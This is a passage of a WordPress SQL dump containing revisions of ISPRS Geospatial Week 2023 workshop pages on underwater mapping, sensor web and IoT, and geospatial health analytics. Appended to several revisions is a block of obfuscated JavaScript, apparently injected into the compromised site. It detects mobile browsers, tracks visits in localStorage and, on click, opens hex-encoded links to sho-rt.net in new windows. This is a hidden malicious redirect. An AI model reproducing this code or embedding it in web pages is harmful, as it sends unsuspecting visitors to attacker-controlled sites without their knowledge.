3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong>','','inherit','closed','closed','','3334-revision-v1','','','2023-02-05 14:32:08','2023-02-05 14:32:08','',3334,'https://gsw2023.com/?p=3836',0,'revision','',0),
(3837,1,'2023-02-05 14:33:42','2023-02-05 14:33:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3396\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]<!-- /wp:paragraph --></p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Intelligent Systems in Sensor Web and Internet of Things</strong></span></h5>\n<h5 class=\"fancy-subtitle start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Organized by ISPRS WG IV/7</strong></span></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify; color: black;\">This workshop aims at discussing the advancement of open standards, methods, algorithms, and systems that are related to sensor web, internet of things (IoT), crowdsourcing, and intelligent systems to support human decision and planning, facilitate knowledge-aware digital twins, and improve governance of smart cities. We welcome papers that address the above <u>from a geospatial perspective</u>, as well as aspects beyond technologies, i.e., social and organizational issues related to the real-time use and citizen trustiness of data obtained from sensors, IoT devices, and crowdsourcing.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><strong>CHAIRS</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" resized_image_dimensions=\"6x8\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"61\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong>Themes of Event</strong></h5>\n<ul>\n<li>\n<h6>Fusion and integration of data from sensors, IoT devices, and crowd sources for supporting digital twins and smart cities.</h6>\n</li>\n<li>\n<h6>New methods and techniques (e.g., machine learning and deep learning based, decentralized processing, and edge computing) for analyzing, predicting, and simulating data from sensors, IoT devices, and crowd sources.</h6>\n</li>\n<li>\n<h6>Research on ethical use of and trust in data from ubiquitous sensors, IoT devices, crowdsourcing, and intelligent systems.</h6>\n</li>\n<li>\n<h6>Potential of sensor web, Internet of Things, crowdsourcing, participatory and intelligent systems for user-centered planning and decision support, situational awareness and emergency management.</h6>\n</li>\n<li>\n<h6>Efficient use of the data from sensors, IoT devices, crowdsourcing, and intelligent/participatory systems for supporting the implementation of UNs’ SDGs.</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Intelligent Systems in<a> Sensor Web and Internet of Things</a></strong>','','inherit','closed','closed','','3386-revision-v1','','','2023-02-05 14:33:42','2023-02-05 14:33:42','',3386,'https://gsw2023.com/?p=3837',0,'revision','',0),
(3838,1,'2023-02-05 14:36:01','2023-02-05 14:36:01','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3446\" img_size=\"600x400\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\">Geospatial Data Analytics for Physical Geography Impact Assessment on Environment, Health and Society</span></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5><em> </em></h5>\n<h5 style=\"text-align: justify;\"><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" post_content_paddings=\"5px 0px 5px 0px\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<table width=\"588\">\n<tbody>\n<tr>\n<td width=\"270\"><em><strong>Air pollution</strong></em></td>\n<td width=\"318\"><em><strong>Aerosols and AOD</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Air /water quality</strong></em></td>\n<td width=\"318\"><em><strong>Vegetation</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Disaster management</strong></em></td>\n<td width=\"318\"><em><strong>Land use changes and dynamics</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>Land degradation</strong></em></td>\n<td width=\"318\"><em><strong>Epidemiology and Disease mapping</strong></em></td>\n</tr>\n<tr>\n<td width=\"270\"><em><strong>GeoAI and Health analytics</strong></em></td>\n<td width=\"318\"><em><strong>Geospatial applications to Environment</strong></em></td>\n</tr>\n</tbody>\n</table>\n<p><em>Research papers are invited with focus on application of <strong>Geospatial technogies including <u>Remote Sensing</u></strong> to the following  broad themes</em></p>\n<p>&nbsp;</p>\n<p>The main concern is related to methods of extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people.</p>\n<h5><strong>Given below I to vi are the 6 grand challenges formulated so as to invite the potential  authors  to bring out their research results as a very specific outcome of the workshop to the maximum possible extent. </strong></h5>\n<p>&nbsp;</p>\n<p>I.Environment and health are dependent on geographical variations, So understanding how physical geography is influencing social geography by using tools of 